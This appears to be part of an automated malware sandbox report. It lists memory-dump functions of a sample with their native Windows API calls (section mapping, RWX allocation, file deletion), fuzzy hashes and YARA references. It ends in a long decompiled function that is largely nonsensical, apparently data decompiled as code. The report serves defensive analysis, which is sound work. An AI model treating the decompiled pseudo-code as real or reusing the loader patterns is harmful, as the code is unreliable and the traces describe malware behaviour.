Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: CF91E571A00649AFDF21DF95DC88EEEBBB8FF89705F004055FA09EA150D731AA44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05081C2B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124nativefilememoryCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 05081C6F
NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05081CFF
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 05081D3B
NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 05081D64

Strings

\??\, xrefs: 05081C4F, 05081C52
en\??\, xrefs: 05081D73
wcsl, xrefs: 05081CA5

Memory Dump Source

Source File: 00000000.00000002.505605421.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false

Similarity

API ID: File$AllocateInformationMemoryOpenProcessQueryReadVirtual
String ID: \??\$en\??\$wcsl
API String ID: 3123795954-2781163289
Opcode ID: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction ID: 254ff7a678938e60aa8771d8d87ec0f9554ac0d166c01f14a032db94924ec490
Opcode Fuzzy Hash: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction Fuzzy Hash: 2D41B2B290025CAFDB20DFD4DC85EEEBBBCEF08310F14415AEA19E6250D7749A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050800AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05080199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 050801B8

Strings

wcsl, xrefs: 05080149
NtMapViewOfSectionNtOpenSection, xrefs: 05080128, 0508012B
@, xrefs: 0508018C
en, xrefs: 05080150
NtOpenSection, xrefs: 0508011D, 05080120

Memory Dump Source

Source File: 00000000.00000002.505605421.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 0ea65f69f05f809b77d650c1993c38d8ca2b9d044e2e6a9c0de15b3c19b91985
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: D33114B1E00258ABCB11DFE4D885EEEBBB8FF08750F10415AE514EB250E774AA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050900AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05090199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 050901B8

Strings

NtOpenSection, xrefs: 0509011D, 05090120
NtMapViewOfSectionNtOpenSection, xrefs: 05090128, 0509012B
en, xrefs: 05090150
@, xrefs: 0509018C
wcsl, xrefs: 05090149

Memory Dump Source

Source File: 00000000.00000002.505634719.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 0d60d82a4b18682d2e5bd3ecb842c5941fc506843204ba902f85e67aa09c1104
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 793123B1E00258AFCB14CFE4D885BDEBBB8FF08B50F20415AE514EB254E7749A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05081C09, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,?), ref: 05081C21

Memory Dump Source

Source File: 00000000.00000002.505605421.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction ID: 54ae84ab8464f00150991caf0ffcecb62ef18a85d1082eaa954023622b1a722c
Opcode Fuzzy Hash: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction Fuzzy Hash: 7CD0C9B595020DBED714DBA0CC47BEEBAACEB45644F008566A502E6190E6B0A6409AB4

Uniqueness

Uniqueness Score: -1.00%

Function 02719620, Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd453e5f0205f71821718f4130c48827c0b505b8142d143944085bb3dd40caaa
Instruction ID: 9157125b2ebd84ecc0b0533b4308d736c42760b64565f5f7faf33e46be3ab50d
Opcode Fuzzy Hash: dd453e5f0205f71821718f4130c48827c0b505b8142d143944085bb3dd40caaa
Instruction Fuzzy Hash: 2DA1CF30A00218CFDB14DFB8C8A57AEBBF2AF89314F148569D955EB385DB349C46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 027177B0, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,02719430,00000040,00003000), ref: 027194F8

Strings

4#, xrefs: 02719494

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: 800349e88bf1421e645e3065e8ae52e23af8a8891eb4e3c9cdf96ca9ca82c1f7
Instruction ID: d7d7549d9508c2b24c0baf8408d0425f86eae72f14d07321c5a8ad550f31cc14
Opcode Fuzzy Hash: 800349e88bf1421e645e3065e8ae52e23af8a8891eb4e3c9cdf96ca9ca82c1f7
Instruction Fuzzy Hash: FA215371904349CFCB10DF9AC894BDEBBF4EF88328F11845AE568A7610C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027177BC, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,02719430,00000040,00003000), ref: 027194F8

Strings

4#, xrefs: 02719494

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: 1cf75a4cb24f14ed2383c48940252d0e322b64ada3581f94b38897fb1d5e4e02
Instruction ID: 429e60c657a7b94176e778e7c0e24952f29c5f545b30347f7cc0dbe317e3cd49
Opcode Fuzzy Hash: 1cf75a4cb24f14ed2383c48940252d0e322b64ada3581f94b38897fb1d5e4e02
Instruction Fuzzy Hash: 1211F0B59042099FDB10DF9AC884BDFBBF4EB88324F148429E959A7210D375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02719488, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,02719430,00000040,00003000), ref: 027194F8

Strings

4#, xrefs: 02719494

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: fd05f3ac16b18e16d1c828239f0c31e9147376144d06dd7349d0ef138b2b4f52
Instruction ID: c9d6146ac9bbcf10a05efd661ca663baba337a1ca6f0441f333b6fbdfac8b7a8
Opcode Fuzzy Hash: fd05f3ac16b18e16d1c828239f0c31e9147376144d06dd7349d0ef138b2b4f52
Instruction Fuzzy Hash: AC113475904209CFCB10DF9AC884BDEFBF4EF88324F108429E568A7210D779A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0271925C, Relevance: 1.6, APIs: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?), ref: 02719357

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: a976144d5c3d1671f0b44255eee8798134feb55627e3c4576044b57d5dc4eac1
Instruction ID: 157dfc71d03c80677790599da91807d095d85b91eb9eca7da417e3c90938a812
Opcode Fuzzy Hash: a976144d5c3d1671f0b44255eee8798134feb55627e3c4576044b57d5dc4eac1
Instruction Fuzzy Hash: CE4144B0D00618CFDB14DFA9C89579EBBF1EF48318F14812AE855AB384D7789886CF81

Uniqueness

Uniqueness Score: -1.00%

Function 027177A4, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?), ref: 02719357

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c7953b0cdfc05bb6321461f3b824c1abac65f43884cd9219b2049f5fa607ee50
Instruction ID: 769c131c36b8c3bc583b2992ab7ca2413b93990c8d41cd805532a3477e993aba
Opcode Fuzzy Hash: c7953b0cdfc05bb6321461f3b824c1abac65f43884cd9219b2049f5fa607ee50
Instruction Fuzzy Hash: 1C4164B0E00618CFDB14CFA9C89479EBBF1AF48314F14812AE915EB384D7789886CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0266D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498670427.000000000266D000.00000040.00000001.sdmp, Offset: 0266D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538912d3cd0ced48c3ffb3d1f397f220d68c75280b4ac4e8989e0a87e622bda1
Instruction ID: c2a797895ce15d01486b5dc0ecb359dcb058d271f6d06811d631381f4d01a37c
Opcode Fuzzy Hash: 538912d3cd0ced48c3ffb3d1f397f220d68c75280b4ac4e8989e0a87e622bda1
Instruction Fuzzy Hash: EB2107B5604340EFDB04DF10D8C8B36FBA5FB88314F24C569D8094B346C3BAD846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0266D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498670427.000000000266D000.00000040.00000001.sdmp, Offset: 0266D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de44a1355ff5dd3688b85d85d30840e22fc529beda2c002cefc06c108532763f
Instruction ID: 001dd50d5cad4e94c905ae58b9a09fdec523893d1327dc820bf66244cf5ba1d3
Opcode Fuzzy Hash: de44a1355ff5dd3688b85d85d30840e22fc529beda2c002cefc06c108532763f
Instruction Fuzzy Hash: EC119D75604280DFDB15CF10D9C4B25FBB1FB88324F28C6AAD8494B756C37AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0265D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498586014.000000000265D000.00000040.00000001.sdmp, Offset: 0265D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2941194002a8f10be651e0da3dc2c5984c5b425f4e5ab641e20fae05a59e757
Instruction ID: 8307f4cb8e2e5c4782f467cd592b462bd5aa2e57c2d2050fc405b1f7c5f85d3a
Opcode Fuzzy Hash: d2941194002a8f10be651e0da3dc2c5984c5b425f4e5ab641e20fae05a59e757
Instruction Fuzzy Hash: A801F77110C3D09AE7244E25CC80766FBA8EF40268F08C11AED045B3C7C3799882C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0265D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498586014.000000000265D000.00000040.00000001.sdmp, Offset: 0265D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2019449cfac954cc0c3a640649dbc8f6a45b4bfb25cbc71ed903e5db699920
Instruction ID: 9ff293b64873c37939add4d571774ae20bdd3b227b78b31b0a0ee9807d105499
Opcode Fuzzy Hash: bb2019449cfac954cc0c3a640649dbc8f6a45b4bfb25cbc71ed903e5db699920
Instruction Fuzzy Hash: CBF062714083949BE7108E15CCC4B66FFA8EF81674F18C45AED085B387D3799845CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00586FB9, Relevance: .6, Instructions: 638
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00586FB9(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed char __esi) {
				signed char _t301;
				void* _t303;
				signed int _t304;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t322;
				signed int _t325;
				signed int _t328;
				signed int _t329;
				signed char _t330;
				signed int _t331;
				intOrPtr* _t332;
				signed char _t333;
				signed int _t335;
				signed char _t336;
				signed char _t337;
				signed int _t338;
				signed int _t339;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				intOrPtr* _t349;
				intOrPtr* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed char _t362;
				signed char _t363;
				signed char _t366;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t370;
				signed char _t371;
				signed char _t372;
				signed char _t373;
				signed int _t374;
				signed int* _t375;
				signed int _t376;
				signed int* _t377;
				signed int _t378;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t383;
				signed char _t386;
				signed char _t388;
				signed char _t389;
				signed char _t390;
				signed int _t391;
				signed int _t392;
				signed int* _t393;
				signed int _t398;
				signed int _t399;
				intOrPtr* _t401;
				signed int _t402;
				char* _t403;
				signed char _t404;
				intOrPtr* _t405;
				intOrPtr* _t407;
				void* _t414;
				signed char _t416;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				intOrPtr* _t421;
				intOrPtr* _t422;
				void* _t423;
				signed int _t426;
				intOrPtr* _t428;
				signed char _t430;
				signed int _t431;
				void* _t433;
				intOrPtr* _t434;
				signed int* _t435;
				signed int _t437;
				void* _t438;
				intOrPtr* _t439;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed char _t444;
				signed int _t445;
				signed char _t446;
				signed char _t448;
				signed int _t451;
				signed int* _t455;
				signed char _t464;
				signed int* _t466;
				void* _t467;
				void* _t469;
				signed int _t470;

				_t444 = __esi;
				_t440 = __edi;
				_t430 = __edx;
				_t301 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t301;
				asm("adc eax, [esi]");
				_t303 = (_t301 & __ecx) + (_t301 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				_t466[0x43aac7] = _t466[0x43aac7] + _t303;
				_t466[0x407647] = _t466[0x407647] + __ecx;
				_t416 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t416 =  *_t416 + _t303;
				_t304 = _t303 + _t416;
				_pop(ds);
				asm("scasd");
				 *_t416 =  *_t416 + _t304;
				_t398 = __ebx + __edx;
				_pop(ds);
				asm("scasd");
				 *_t416 =  *_t416 + _t304;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t304;
				_pop(ss);
				asm("scasd");
				 *_t416 =  *_t416 + (_t304 | 0x17000102);
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t416;
				asm("scasd");
				 *__esi =  *__esi + 0x2c;
				 *_t398 =  *_t398 + __edx;
				asm("das");
				asm("scasd");
				 *_t416 =  *_t416 + 0x2c;
				 *((intOrPtr*)(_t469 +  &(_t466[0x18083]))) =  *((intOrPtr*)(_t469 +  &(_t466[0x18083]))) + __edx;
				asm("sbb al, 0x2f");
				_pop(ds);
				 *0x4F000748 =  *0x4F000748 ^ __edx;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + 0x4f00072e;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *0x161a6530 =  *0x161a6530 + _t416;
				 *__edi =  *__edi + __edx;
				 *(__esi + 0x1a) =  *(__esi + 0x1a) ^ _t416;
				_push(es);
				 *_t416 =  *_t416 + _t398;
				asm("sbb al, 0x1f");
				_push(ss);
				_push(es);
				 *0x4F00074A =  *((intOrPtr*)(0x4f00074a)) + __edx;
				_t466[6] = _t466[6] & _t398;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + 0x7f00072e;
				_push(ss);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				_t311 = 0x1700011a;
				ss = ss;
				asm("scasd");
				 *_t416 =  *_t416 + 0x1a;
				_t27 = __esi + __edx + 0x1020d;
				 *_t27 =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t416;
				if( *_t27 < 0) {
					 *0x83000102 =  *0x83000102 ^ _t416;
					 *0xFFFFFFFFD6FA050D =  *0xFFFFFFFFD6FA050D << 1;
					 *(__edi - 0x10ffff00) =  *(__edi - 0x10ffff00) ^ _t416;
					_t311 = 0xffffffffdefa050f ^ _t398;
					asm("sbb al, [ecx]");
					_t416 = _t416 + _t398;
					 *_t416 =  *_t416 ^ 0x0000001a;
					asm("sbb eax, [ecx]");
					 *0x1020d31 =  *0x1020d31 + 0x1a;
				}
				 *0x1020d31 =  *0x1020d31 + _t430;
				 *((intOrPtr*)(_t444 + 0x16)) =  *((intOrPtr*)(_t444 + 0x16)) + _t311;
				_pop(ss);
				_push(ss);
				_t431 = _t430 &  *(_t440 + 0x2b00060d);
				 *(_t440 + 0x3400010d) =  *(_t440 + 0x3400010d) ^ _t431;
				 *(_t440 + 0x3f000109) =  *(_t440 + 0x3f000109) ^ _t444;
				_t314 = (_t311 | 0x77000102) ^ _t440;
				 *_t416 =  *_t416 + _t314;
				_t315 = _t314 + _t398;
				asm("clc");
				 *_t416 =  *_t416 + _t315;
				 *((intOrPtr*)(_t315 + 0x31)) =  *((intOrPtr*)(_t315 + 0x31)) + _t431;
				_t316 = _t315 | 0x57000102;
				_t399 = _t398 ^ _t440;
				asm("adc [ecx], al");
				 *((intOrPtr*)(_t444 + 0x31)) =  *((intOrPtr*)(_t444 + 0x31)) + _t316;
				asm("scasd");
				 *_t416 =  *_t416 + _t316;
				 *((intOrPtr*)(_t316 + 0x31)) =  *((intOrPtr*)(_t316 + 0x31)) + _t431;
				_t441 = _t316;
				asm("scasd");
				 *_t444 =  *_t444 + _t431;
				ss = ss;
				asm("sgdt [es:eax]");
				_t470 = _t469 - 1;
				_t320 = (_t440 | 0x338b0006) + _t416 ^ 0x000000af;
				 *_t416 =  *_t416 + _t320;
				 *((intOrPtr*)(_t399 + 0x34)) =  *((intOrPtr*)(_t399 + 0x34)) + _t320;
				_t322 = (_t320 | 0x7e000102) ^ 0x000000af;
				 *_t416 =  *_t416 + _t322;
				 *((intOrPtr*)(_t416 + 0x10d9734)) =  *((intOrPtr*)(_t416 + 0x10d9734)) + _t399;
				 *_t441 =  *_t441 + _t431;
				asm("cdq");
				_t325 = _t322 ^ 0x10d27 | 0x354d0001;
				asm("scasd");
				 *_t444 =  *_t444 + _t325;
				_push(es);
				asm("lahf");
				asm("cmpsd");
				asm("scasd");
				_t328 = _t325 ^ 0xffffffff8056020d;
				asm("lahf");
				asm("sbb al, 0x1");
				 *((intOrPtr*)(_t470 + _t444 - 0x51)) =  *((intOrPtr*)(_t470 + _t444 - 0x51)) + _t416;
				 *_t416 =  *_t416 + _t328;
				_t329 = _t328 ^ 0x013300af;
				asm("out 0x1c, eax");
				asm("enter 0x20, 0x0");
				 *_t329 =  *_t329 + _t329;
				_t330 = _t444;
				_t445 = _t329;
				 *((intOrPtr*)(_t416 + 0x1005121)) =  *((intOrPtr*)(_t416 + 0x1005121)) + _t330;
				_t433 = _t431 + _t416 + _t431 + _t416;
				 *_t330 =  *_t330 & _t330;
				 *_t330 =  *_t330 + _t330;
				 *((intOrPtr*)(_t445 + 0x6021b200)) =  *((intOrPtr*)(_t445 + 0x6021b200)) + _t433;
				 *0x35 =  *0x35 + _t330;
				_t401 = 0x35 + _t330;
				 *_t330 =  *_t330 & _t330;
				 *_t330 =  *_t330 + _t330;
				 *((intOrPtr*)(_t445 + 0x6821c100)) =  *((intOrPtr*)(_t445 + 0x6821c100)) + _t433;
				 *0x20f400 =  *0x20f400 + _t330;
				 *_t330 =  *_t330 + _t330;
				 *((intOrPtr*)(_t445 + 0x6e21de00)) =  *((intOrPtr*)(_t445 + 0x6e21de00)) + _t433;
				 *_t445 =  *_t445 + _t330;
				_t331 = _t330 + 0x35;
				 *_t331 =  *_t331 & _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t401 + 0x7621f300)) =  *((intOrPtr*)(_t401 + 0x7621f300)) + _t433;
				 *_t445 =  *_t445 + _t331;
				 *_t416 =  *_t416 + _t416;
				 *_t331 =  *_t331 & _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t401 + 0x7b221400)) =  *((intOrPtr*)(_t401 + 0x7b221400)) + _t433;
				 *_t441 =  *_t441 + _t331;
				 *_t401 =  *_t401 + _t401;
				 *_t331 =  *_t331 & _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t401 + 0x7b222300)) =  *((intOrPtr*)(_t401 + 0x7b222300)) + _t433;
				 *_t441 =  *_t441 + _t331;
				 *((intOrPtr*)(_t331 + 0x27)) =  *((intOrPtr*)(_t331 + 0x27)) + 0x35;
				 *((intOrPtr*)(_t445 - 0x68ddd300)) =  *((intOrPtr*)(_t445 - 0x68ddd300)) + _t433;
				 *_t441 =  *_t441 + _t331;
				 *_t445 =  *_t445 + _t401;
				 *_t331 =  *_t331 & _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t445 - 0x6cf1dae8)) =  *((intOrPtr*)(_t445 - 0x6cf1dae8)) + _t331;
				 *_t331 =  *_t331 + _t416;
				 *_t445 =  *_t445 + _t331;
				 *_t331 =  *_t331 & _t331;
				 *_t331 =  *_t331 + _t331;
				 *((intOrPtr*)(_t416 + 0x6e223c18)) =  *((intOrPtr*)(_t416 + 0x6e223c18)) + _t433;
				 *_t331 =  *_t331 + _t416;
				_t466[8] = _t466[8] + _t433;
				 *_t331 =  *_t331 + _t331;
				 *_t331 =  *_t331 + _t331;
				_t332 = _t401;
				_t402 = _t331;
				 *((intOrPtr*)(_t433 - 0x46)) =  *((intOrPtr*)(_t433 - 0x46)) + _t402;
				 *_t332 =  *_t332 + _t416;
				_t333 = _t332 + 0x35;
				asm("daa");
				 *_t333 =  *_t333 + _t333;
				 *_t333 =  *_t333 + _t333;
				_t446 = _t333;
				 *((intOrPtr*)(_t433 + 0x22)) =  *((intOrPtr*)(_t433 + 0x22)) + _t433;
				asm("in al, 0x0");
				_t335 = _t445 |  *_t445;
				 *((intOrPtr*)(_t446 - 0xadd8300)) =  *((intOrPtr*)(_t446 - 0xadd8300)) + _t433;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				 *_t335 =  *_t335 & _t335;
				 *_t335 =  *_t335 + _t335;
				 *((intOrPtr*)(_t416 + 0x6e228700)) =  *((intOrPtr*)(_t416 + 0x6e228700)) + _t433;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				 *_t335 =  *_t335 & _t335;
				 *_t335 =  *_t335 + _t335;
				 *((intOrPtr*)(_t446 + 0x6e22a100)) =  *((intOrPtr*)(_t446 + 0x6e22a100)) + _t433;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				_t443 = 0x28;
				 *_t335 =  *_t335 & _t335;
				 *_t335 =  *_t335 + _t335;
				 *((intOrPtr*)(_t416 + 0x6e22b200)) =  *((intOrPtr*)(_t416 + 0x6e22b200)) + _t433;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				_push(ds);
				 *_t335 =  *_t335 & _t335;
				 *_t335 =  *_t335 + _t335;
				 *((intOrPtr*)(_t446 - 0x6cf1dae8)) =  *((intOrPtr*)(_t446 - 0x6cf1dae8)) + _t335;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				asm("insd");
				 *_t335 =  *_t335 & _t335;
				 *_t335 =  *_t335 + _t335;
				 *((intOrPtr*)(_t416 + 0x6e223c18)) =  *((intOrPtr*)(_t416 + 0x6e223c18)) + _t433;
				 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) + _t416;
				 *_t335 = gs;
				 *_t335 =  *_t335 + _t335;
				 *_t335 =  *_t335 + _t335;
				_t336 = _t446;
				_t434 = _t433 + _t336;
				_t337 = _t336 &  *_t443;
				 *((intOrPtr*)(_t337 + _t337)) =  *((intOrPtr*)(_t337 + _t337)) + _t416;
				asm("les ebp, [eax]");
				 *_t337 =  *_t337 + _t337;
				 *_t337 =  *_t337 + _t337;
				_t338 = _t335;
				_t448 = _t337;
				_t418 = _t416 + _t402 &  *(_t416 + _t402);
				 *0x294c00 =  *0x294c00 + _t418;
				 *_t338 =  *_t338 + _t338;
				 *((intOrPtr*)(_t448 + 0x67231200)) =  *((intOrPtr*)(_t448 + 0x67231200)) + _t434;
				 *_t448 =  *_t448 + _t418;
				 *((intOrPtr*)(_t338 + 0x29)) =  *((intOrPtr*)(_t338 + 0x29)) + _t338;
				 *((intOrPtr*)(_t448 - 0x6adca100)) =  *((intOrPtr*)(_t448 - 0x6adca100)) + _t434;
				 *_t418 =  *_t418 + _t434;
				 *_t338 =  *_t338 + _t338;
				_t339 = _t338 -  *_t338;
				 *_t339 =  *_t339 + _t339;
				 *((intOrPtr*)(_t448 + 0x29238200)) =  *((intOrPtr*)(_t448 + 0x29238200)) + _t434;
				 *_t434 =  *_t434 + _t434;
				 *((intOrPtr*)(_t434 + _t466)) =  *((intOrPtr*)(_t434 + _t466)) + _t418;
				 *_t339 =  *_t339 + _t339;
				 *((intOrPtr*)(_t418 - 0x48dc5100)) =  *((intOrPtr*)(_t418 - 0x48dc5100)) + _t434;
				 *_t402 =  *_t402 + _t434;
				 *_t448 =  *_t448 + _t402;
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + _t339;
				 *((intOrPtr*)(_t448 - 0x6cf1dae8)) =  *((intOrPtr*)(_t448 - 0x6cf1dae8)) + _t339;
				 *_t448 =  *_t448 + _t434;
				 *((intOrPtr*)(_t434 + _t466)) =  *((intOrPtr*)(_t434 + _t466)) + _t339;
				 *((intOrPtr*)(_t402 + 0x24)) =  *((intOrPtr*)(_t402 + 0x24)) + 0x35;
				_push(ss);
				 *0x0000002D =  *((intOrPtr*)(0x2d)) + 0x35;
				 *2 =  *2 + 2;
				 *2 =  *2 + 2;
				 *((intOrPtr*)(_t402 + 0x10)) =  *((intOrPtr*)(_t402 + 0x10)) + _t418;
				 *_t434 =  *_t434 + 1;
				asm("sbb [eax], al");
				L3();
				 *0x52106B02 =  *((intOrPtr*)(0x52106b02)) + _t434;
				_t403 = _t402 +  *_t434;
				 *((intOrPtr*)(_t466 + _t470)) =  *((intOrPtr*)(_t466 + _t470)) + _t418;
				_t451 = _t339;
				 *((intOrPtr*)(_t403 + 0x10)) =  *((intOrPtr*)(_t403 + 0x10)) + _t418;
				 *_t403 =  *_t403 + 0x1c;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t451 - 0x35db6d00)) =  *((intOrPtr*)(_t451 - 0x35db6d00)) + _t434;
				_t404 = _t403 +  *0x2d7800;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t451 + 0x40f8300)) =  *((intOrPtr*)(_t451 + 0x40f8300)) + _t434;
				_t346 = _t451;
				 *((intOrPtr*)(_t404 + 0x1f04040f)) =  *((intOrPtr*)(_t404 + 0x1f04040f)) + 2;
				 *_t346 =  *_t346 + 2;
				 *[cs:eax] =  *[cs:eax] + 2;
				 *_t346 =  *_t346 + 2;
				_t347 = _t418;
				_t419 = _t346;
				 *((intOrPtr*)(_t470 + 0x200449)) =  *((intOrPtr*)(_t470 + 0x200449)) + _t347;
				 *0x00000004 = _t419;
				 *_t347 =  *_t347 + 2;
				 *_t347 =  *_t347 + 2;
				_t348 = _t419;
				_t420 = _t347;
				 *((intOrPtr*)(_t404 + 0x2204c824)) =  *((intOrPtr*)(_t404 + 0x2204c824)) + 0x35;
				 *0x00000004 =  *0x00000004 + _t404;
				 *_t348 =  *_t348 & _t348;
				 *_t348 =  *_t348 + 2;
